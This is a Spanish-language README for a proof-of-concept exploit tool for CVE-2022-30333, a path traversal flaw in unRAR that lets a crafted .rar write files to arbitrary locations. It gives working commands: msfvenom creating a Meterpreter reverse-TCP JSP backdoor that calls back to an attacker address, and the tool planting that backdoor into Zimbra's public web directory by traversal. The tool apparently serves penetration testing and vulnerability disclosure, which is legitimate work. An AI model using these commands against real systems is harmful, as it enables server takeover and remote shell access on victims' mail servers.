
Prueba de concepto del exploit para CVE-2022-30333, una vulnerabilidad de path traversal en unRAR, que genera archivos .rar maliciosos para colocar payloads en ubicaciones arbitrarias. Se integra con Metasploit y msfvenom para pruebas de penetración.
Una prueba de concepto para CVE-2022-30333 - una vulnerabilidad de path traversal en unRAR versiones anteriores a la 6.11. Creé esto como una demostración del exploit para un artículo en AttackerKB, y espero incorporarlo en un Módulo de Metasploit pronto!
Básicamente, proporcionas un destino (incluyendo path traversal) y algunos datos de archivo, y esta herramienta generará un .rar que extraerá ese archivo en esa ubicación. La longitud máxima del archivo es de 104 bytes, y la longitud máxima del archivo es de 4096 bytes. (Eso no es intrínseco a la vulnerabilidad, es solo lo que elegí cuando generé el archivo).
Por ejemplo, genera una puerta trasera con msfvenom:
$ msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.0.0.146 -f jsp -o payload.jsp
Luego crea un archivo .rar, plantando el .jsp en algún lugar divertido:
$ ruby ./cve-2022-30333.rb '../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/backdoor.jsp' ./payload.jsp > file.rar